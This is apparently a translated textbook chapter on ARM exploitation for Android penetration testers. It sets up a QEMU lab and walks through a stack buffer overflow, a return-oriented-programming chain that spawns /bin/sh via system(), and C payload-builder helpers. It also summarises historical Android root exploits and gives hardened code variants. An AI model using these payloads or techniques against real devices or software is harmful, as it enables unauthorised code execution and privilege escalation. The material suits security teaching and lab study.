
Android Penetration Testing Learning Handbook, Chapter 8: ARM Exploitation

Source: collected by IT165. Published: 2016-12-09 21:39:21

Chapter 8: ARM Exploitation

Author: Aditya Gupta

Translator: 飞龙 (FeiLong)

License: CC BY-NC-SA 4.0

In this chapter we will learn the basics of the ARM processor and the different kinds of vulnerabilities that exist in the ARM world. We will go on to actually exploit those vulnerabilities, so as to get a clear picture of the whole scenario. In addition, we will look at different Android root exploits and the underlying vulnerabilities they rely on. Considering that most Android smartphones today use ARM-based processors, it is essential for a penetration tester to understand ARM and the security risks that come with it.

8.1 Introduction to the ARM architecture

ARM is a Reduced Instruction Set Computing (RISC) architecture, which means it has far fewer instructions than a Complex Instruction Set Computing (CISC) machine. ARM processors are found in almost every device around us, such as smartphones, televisions, e-book readers and many more embedded devices.

ARM has 16 visible general-purpose registers, R0 to R15. Of these 16, five are used for special purposes. These five registers and their names are:

- R11: frame pointer (FP)
- R12: intra-procedure-call scratch register (IP)
- R13: stack pointer (SP)
- R14: link register (LR)
- R15: program counter (PC)

The following figure shows the ARM architecture (figure not reproduced in this copy):

Of these five, we will pay special attention to the following three:

- Stack pointer (SP): the register that holds the pointer to the top of the stack
- Link register (LR): holds the return address when the program enters a subroutine (the bl instruction writes it)
- Program counter (PC): holds the address of the instruction to be executed

Note

One thing to note here is that the value read from PC is neither the address of the instruction currently executing nor simply that of the next one. Because of the pipeline, in which instructions move through the stages fetch, decode and execute, an instruction that reads PC sees the address of the instruction two ahead of it, that is, its own address plus 8 in ARM mode (plus 4 in Thumb mode). To control the program flow we need to control the value that ends up in PC, or in LR (which is loaded back into PC on return, and so eventually gives us control of PC).

Execution modes

ARM has two different execution modes:

- ARM mode: in ARM mode all instructions are 32 bits wide
- Thumb mode: in Thumb mode instructions are mostly 16 bits wide

The current mode is determined by the T bit of the CPSR register. Thumb-2 is sometimes described as a third mode, but it is really an extension of the Thumb instruction set that mixes 16-bit and 32-bit encodings. We will not go into the differences between ARM and Thumb mode in this chapter, as that is beyond the scope of this book.

8.2 Setting up the environment

Before we start exploiting vulnerabilities on the ARM platform, it is recommended that you set up an environment. Even though the emulator in the Android SDK runs by emulating the ARM platform, and most smartphones are ARM based, we will begin ARM exploitation by configuring QEMU, an open source hardware virtualizer and emulator.

To run all the following steps on an Android emulator or device instead, we would need to download the Android NDK and use the tools it provides to compile our binaries for the Android platform. If you are on a Mac, installing QEMU is comparatively easy and can be done with brew install qemu. Let us now set up QEMU on an Ubuntu system. Follow these steps:

The first step is to install QEMU's build dependencies and download its source archive, as shown (apt-get build-dep needs deb-src entries enabled in your sources list):

sudo apt-get build-dep qemu
wget http://wiki.qemu-project.org/download/qemu-1.7.0.tar.bz2

Next we configure QEMU for the ARM system-emulation target and build it. Extract the archive, change into the directory and run the following commands:

tar xjf qemu-1.7.0.tar.bz2
cd qemu-1.7.0
./configure --target-list=arm-softmmu
make && sudo make install

Once QEMU is installed, we can download a Debian image for the ARM platform to practise exploitation on. The required downloads are listed at http://people.debian.org/~aurel32/qemu/armel/.

Here we download the disk image in qcow2 format (QEMU's own disk image format), which holds our operating system: debian_squeeze_armel_standard.qcow2. The kernel file is vmlinuz-2.6.32-5-versatile and the RAM disk (initrd) is initrd.img-2.6.32-5-versatile. Once all the necessary files are downloaded, we can start the QEMU instance with the following command:

qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.32-5-versatile \
    -initrd initrd.img-2.6.32-5-versatile \
    -hda debian_squeeze_armel_standard.qcow2 \
    -append 'root=/dev/sda1' -redir tcp:2222::22

The -redir option forwards TCP port 2222 on the host to port 22 (SSH) in the guest, so that we can log in to the guest over SSH from the host. Newer QEMU releases have dropped -redir; the equivalent there is -net user,hostfwd=tcp::2222-:22.
Once the system has booted, we can log in to the Debian QEMU instance with the following command (use the address of the machine running QEMU instead of localhost if you connect from elsewhere):

ssh -p 2222 root@localhost

You will be asked for a username and password; the default credentials are root:root. Once logged in, we see a screen similar to the following screenshot (not reproduced in this copy):

8.3 A simple stack-based buffer overflow

Simply put, a buffer is a place where data of any kind is stored. An overflow occurs when more data is written into the buffer than the buffer itself can hold. For a buffer on the stack, the excess bytes land on whatever sits above it, including the saved return address, and an attacker can exploit this to take control of the program and execute a malicious payload.

Let us take a simple program as an example and see how we can exploit it. In the following screenshot (not reproduced in this copy) we have a simple program with three functions: vulnerable, ShouldNotBeCalled and main. This is the program we will try to exploit:

During the whole run of the program, the ShouldNotBeCalled function is never called.

The vulnerable function simply copies its argument into a fixed-size stack buffer with strcpy, which does not check the length of the string. Before compiling we disable ASLR, so that the addresses we observe in the debugger stay the same between runs, and then compile with debugging symbols (on a newer toolchain than the one in this Debian image you also need -fno-stack-protector, otherwise the stack canary detects the overwrite before the function returns):

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -g buffer_overflow.c -o buffer_overflow
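The program itself survives only as a screenshot in the original, so the following is an added reconstruction rather than the book's listing: a program with the three functions the text describes, in which vulnerable() copies its argument into a fixed-size stack buffer with strcpy (the buffer size of 10 and the message text are assumptions), plus a bounds-checked variant beside it that shows the check the vulnerable version lacks. Compiled as above on the ARM guest, the vulnerable version behaves as described in the rest of this section.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Never called by the program itself; reaching it is the exploit's goal. */
void ShouldNotBeCalled(void)
{
    printf("This function should not be called!\n");
    exit(0);
}

/* Vulnerable: strcpy copies until the first NUL without looking at the size
 * of buff, so a long argument runs over the saved FP and LR that the
 * function's prologue pushed above the buffer. (Buffer size is an assumption.) */
void vulnerable(const char *arg)
{
    char buff[10];
    strcpy(buff, arg);
}

/* Hardened form: refuse anything that does not fit, then copy exactly the
 * n + 1 bytes that do. Returns the number of characters copied, or -1 when
 * the input was rejected. */
int vulnerable_fixed(const char *arg)
{
    char buff[10];
    size_t n = strlen(arg);
    if (n >= sizeof buff)
        return -1;
    memcpy(buff, arg, n + 1);
    return (int)n;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    return 0;
}
```

Run it as ./buffer_overflow AAAABBBBCCCC from the guest shell, or under gdb as shown below; the hardened variant is only there for comparison and is not called by main.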

Next, we simply load the binary into the GNU Debugger (GDB) and start debugging it, with the following command:

gdb -q buffer_overflow

Now we can use the disass command to disassemble a particular function, here ShouldNotBeCalled, as shown in the following screenshot (not reproduced in this copy):

As we can see in the screenshot, the ShouldNotBeCalled function starts at memory address 0x00008408. If we look at the disassembly of main, we see that the vulnerable function is called at 0x000084a4 and returns to 0x000084a8. That return address is what bl stored in LR when main called vulnerable, and what vulnerable's prologue pushed onto the stack; when the epilogue pops that saved value back into PC, execution continues wherever it points. So, since the program enters the vulnerable function and uses strcpy, which does not check the size of the string being copied, if we can overwrite the saved LR of the subroutine while the program is inside the vulnerable function, we control the entire program flow.

The goal here is to work out exactly which bytes of our input land on the saved LR, and then put the address of ShouldNotBeCalled there so that the function returns into ShouldNotBeCalled. Let us start by running the program with a long argument and see what happens. Before that, we also need to set breakpoints on the vulnerable function and on the address of the strcpy call:

b vulnerable 
b *<address of the strcpy call>

Once the breakpoints are set, we run the program with the argument AAAABBBBCCCC to see how the stack gets overwritten. We notice that it hits the first breakpoint on entry to the vulnerable function and then the next one at the strcpy call. Once strcpy has run, we can examine the stack with the x command, giving it the address held in SP (for example x/8xw $sp), as shown in the following screenshot (not reproduced in this copy):

We can see that the stack has been overwritten with the buffer we supplied (ASCII 41 for A, 42 for B, and so on). From the screenshot we see that we still need four more bytes to reach the return address, which in this case is 0x000084a8.

So the final string is 16 bytes of filler followed by the address of ShouldNotBeCalled, as in the following command:

r `printf 'AAAABBBBCCCCDDDD\x08\x84'`

As we can see in the following screenshot (not reproduced in this copy), the start address of ShouldNotBeCalled has been appended to the argument:

Note that, since this is a little-endian architecture, the bytes are written in reverse order. Only the two low bytes 0x08 0x84 need to be supplied: strcpy's own terminating NUL writes the third byte, and the fourth byte of the saved 0x000084a8 is already 0x00, so the null bytes in the target address do not get in our way here. Also keep the address even: on an ARM core that supports Thumb, bit 0 of an address loaded into PC by pop or bx selects Thumb mode, and ShouldNotBeCalled is ARM code. Once we run it, we can see that the program's ShouldNotBeCalled function gets called, as shown in the following screenshot:

8.4 Return-oriented programming

In most cases we do not just want to call another function that already exists in the program. Instead, we want to place shellcode in our attack vector that performs whatever malicious action we specify in it. However, on most ARM-based devices the stack and other writable regions of memory are marked non-executable (XN), which prevents us from placing shellcode there and executing it.

Therefore the attacker has to rely on what is called return-oriented programming (ROP): chaining together small instruction sequences that already exist in executable memory (for example in libc) so that, taken together, they do the work the shellcode would have done. These sequences are called ROP gadgets. To chain gadgets we need sequences that end in an instruction which transfers control to an address we supply from the overflowed stack, such as pop {pc}, or a pop into lr followed by bx lr, so that each gadget hands over to the next.

For example, if we disassemble seed48() (a libc function) while the program is running, we notice the following output (screenshot not reproduced in this copy):

Looking at the disassembly, we notice that it ends with an ADD instruction followed by a POP and a BX instruction, which makes it a perfect ROP gadget. Here is how an attacker might use it: first return into the POP instruction, which loads r4 and lr from the stack, so that the address of /bin/sh minus 6 is popped into r4 and the address of the ADD instruction is popped into LR. When bx lr jumps back to the ADD, that is r0 = r4 + 6, we now hold the address of /bin/sh in r0, which is the first-argument register of the ARM calling convention. The POP then runs again, so we supply any junk value for r4 and the address of system() for LR.

This means we finally jump into system() with /bin/sh as its argument, which spawns a shell. In the same way we can build any ROP chain and make it do whatever we need. Since ROP is one of the most complex topics in exploitation, you are strongly advised to try it yourself, analysing the disassembly and building the exploit.
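The two payloads described above, the saved-LR overwrite from section 8.3 and the pop/add/bx chain from this section, written out as an added C helper; this is not code from the book. The gadget addresses, the address of the "/bin/sh" string and the address of system() used in the test values are hypothetical placeholders; on the real target they come from the disassembly and from gdb. The last function models what strcpy actually delivers, which is the constraint that makes the NUL bytes in 0x00008408 harmless in section 8.3 but forbids NUL bytes anywhere inside a ROP chain.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Append a 32-bit value in little-endian byte order (the ARM guest is
 * little-endian) and return the new payload length. */
static size_t put_le32(uint8_t *out, size_t len, uint32_t v)
{
    out[len++] = (uint8_t)(v & 0xff);
    out[len++] = (uint8_t)((v >> 8) & 0xff);
    out[len++] = (uint8_t)((v >> 16) & 0xff);
    out[len++] = (uint8_t)((v >> 24) & 0xff);
    return len;
}

/* Section 8.3: `pad` filler bytes up to the saved LR slot, then the address
 * to return into (0x00008408 for ShouldNotBeCalled in the text). */
size_t build_return_payload(uint8_t *out, size_t pad, uint32_t target)
{
    memset(out, 'A', pad);
    return put_le32(out, pad, target);
}

/* Section 8.4: chain for a gadget of the shape
 *     add r0, r4, #6
 *     pop {r4, lr}
 *     bx  lr
 * The saved LR is replaced with the address of the pop; every later dword is
 * consumed by a pop {r4, lr}, and bx lr then jumps to what was popped into lr:
 *     [binsh - 6] -> r4   [add_gadget]  -> lr   (add runs: r0 = &"/bin/sh")
 *     [junk]      -> r4   [system_addr] -> lr   (system(r0), r0 = "/bin/sh")
 * All addresses are assumed to be ARM-mode (even) addresses. */
size_t build_rop_chain(uint8_t *out, size_t pad, uint32_t pop_gadget,
                       uint32_t add_gadget, uint32_t binsh, uint32_t system_addr)
{
    size_t len = pad;
    memset(out, 'A', pad);
    len = put_le32(out, len, pop_gadget);   /* lands on the saved LR */
    len = put_le32(out, len, binsh - 6);    /* first pop -> r4 */
    len = put_le32(out, len, add_gadget);   /* first pop -> lr, bx lr */
    len = put_le32(out, len, 0x41414141u);  /* second pop -> r4 (junk) */
    len = put_le32(out, len, system_addr);  /* second pop -> lr, bx lr */
    return len;
}

/* Number of bytes strcpy() writes for this payload: everything up to and
 * including the first NUL. Whatever follows the first NUL never reaches the
 * stack, so it must already be correct there: for 0x00008408 the third byte is
 * strcpy's own terminator and the fourth is the 0x00 that the saved 0x000084a8
 * already has. A ROP chain, by contrast, must contain no NUL at all. */
size_t strcpy_bytes_written(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return i + 1;
    return len + 1;   /* no NUL inside: everything plus strcpy's terminator */
}

int main(void)
{
    uint8_t pl[64];
    size_t n = build_return_payload(pl, 16, 0x00008408u);
    /* Emit the bytes strcpy will see, minus its terminator: the same 18 bytes
     * that the printf in the gdb command above produces. */
    fwrite(pl, 1, strcpy_bytes_written(pl, n) - 1, stdout);
    return 0;
}
```

Compiled on the guest, the program's output can be substituted into the gdb run command (r `./payload`) exactly like the printf above; for a ROP chain, swap the call in main for build_rop_chain with the addresses read from gdb and check that strcpy_bytes_written returns the full length plus one before using it.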

8.5 Android root exploits

Since the early versions of Android, root exploits have kept appearing in each subsequent version and in the builds of the various Android device manufacturers. Rooting simply means obtaining privileged access to the device, which the manufacturer does not grant to the user by default. These root exploits take advantage of various vulnerabilities in the Android system. The following is a list of some of them, with the idea each exploit is based on:

- Exploid: based on CVE-2009-1185 in udev, the component responsible for handling device hotplug events such as USB connections. udev did not verify whether a Netlink message (the mechanism that carries such events from the Linux kernel to userspace) really came from the kernel or had been forged by an attacker, so an attacker could simply send udev messages from userspace and escalate privileges.
- Gingerbreak: another exploit, based on a vulnerability in vold (the volume daemon), similar in nature to the one used by Exploid.
- RageAgainstTheCage: based on RLIMIT_NPROC, the limit on the number of processes a user may have, which comes into play when setuid is called. The adb daemon starts as root and then calls setuid() to drop its privileges; but if the target user has already reached the RLIMIT_NPROC maximum, setuid() fails, and because adb did not check its return value it simply carried on running as root.
- Zimperlich: uses the same concept as RageAgainstTheCage, but relies on the zygote process dropping its root privileges.
- KillingInTheNameOf: exploited a vulnerability in the ashmem (shared memory) interface to change the value of ro.secure, the property that decides whether adb runs as root on the device.

These are some of the best-known exploits used to root Android devices.
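The RageAgainstTheCage and Zimperlich entries above describe one bug class: a privileged daemon calls setuid() and never checks whether it worked. The following added example (not the adb daemon's source, a simplified illustration) shows that pattern next to a privilege drop that fails closed: each call is checked, the resulting ids are verified, and the drop is confirmed to be irreversible.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* The pattern RageAgainstTheCage relied on: setuid() is called and the daemon
 * carries on whether or not it succeeded. When the target user already has
 * RLIMIT_NPROC processes, setuid() fails with EAGAIN and the process silently
 * keeps running as root. */
int drop_privileges_unchecked(uid_t uid, gid_t gid)
{
    int rc;
    rc = setgid(gid);
    rc = setuid(uid);   /* result never examined: this is the bug */
    (void)rc;
    return 0;           /* reports success unconditionally */
}

/* Hardened form: check every call, verify the ids the kernel now reports,
 * and make sure root cannot be regained before returning success. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (setgid(gid) != 0) {
        perror("setgid");
        return -1;
    }
    if (setuid(uid) != 0) {
        perror("setuid");   /* EAGAIN here is the RLIMIT_NPROC case */
        return -1;
    }
    /* Confirm that real and effective ids were actually switched. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    /* A genuine drop from root is irreversible: regaining uid 0 must fail. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    /* As root this really drops to the given ids; as an ordinary user both
     * calls simply keep the current ids, which is enough to exercise them. */
    if (drop_privileges(getuid(), getgid()) != 0) {
        fprintf(stderr, "refusing to continue with elevated privileges\n");
        return 1;
    }
    printf("running as uid %u\n", (unsigned)getuid());
    return 0;
}
```

A daemon that starts as root should also clear its supplementary groups (setgroups) before setgid/setuid; that call is omitted here because it requires root and the example is meant to run as any user.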

Summary

In this chapter we looked at different ways of exploiting Android and ARM. Hopefully this chapter is a good starting point for anyone who wants to go deeper into ARM exploitation.

In the next chapter we will learn how to write an Android penetration testing report.
